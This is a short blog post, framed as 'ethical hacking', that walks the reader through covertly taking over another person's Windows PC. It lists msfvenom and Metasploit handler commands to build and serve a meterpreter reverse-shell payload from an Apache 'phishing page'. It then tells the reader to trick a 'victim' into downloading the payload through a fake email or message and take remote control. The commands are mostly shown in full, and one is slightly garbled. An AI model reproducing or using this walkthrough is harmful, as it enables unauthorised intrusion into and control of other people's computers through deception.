Gain Access to Someone's Pc or Laptop Without Their Knowledge.

by - August 02, 2020

HOW TO GAIN ACCESS TO SOMEONE'S PC OR LAPTOP WITHOUT THEIR KNOWLEDGE?

If you are interested in the field of ethical hacking then here is some useful information for you. If you are taking up ethical hacking as a course then you will come across these kind of activities where you have to gain access over a device. So below is a step by step guide which you need to follow carefully.

 

For this method we will use Metasploit to create payload.

I will show you how to attack windows through Kali Linux. Just by changing commands you can hack Linux also.

 

TO KNOW 'WHAT IS KALI LINUX?'- CLICK HERE

TO KNOW 'HOW TO INSTALL KALI LINUX IN ANY ANDROID DEVICE?'- CLICK HERE

 

STEP BY STEP GUIDE:

 

Open Metasploit Framework in Kali. Now type 'msfvenom -p windows/meterpreter/reverse_tcp lhost=(your ip address in kali) lport=1234-format=exe > payload.exe' hit enter and let the payload generate.

 

Here we will use apache web server to host payload and generate link.
cp payload.exe /var/www/html/ (this is where you host your website or phishing page)

 

service postgresql start 

service apache2 start

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/

reverse_tcp

set lhost (your ip in kali)

set lport 1234

exploit -j -z

 

Show your creativity and make target visit your site by sending link through a fake email, message, etc. which we uploaded in 5th step and when target visit this site he is actually downloading the payload in background.

 

Type in terminal session -i

 

Now you are accessing victim's PC remotely.

 

Type ifconfig to see victims ip and MAC address.

 

Now you can do anything with windows cmd commands. HACKED!!!

 

You May Also Like

0 comments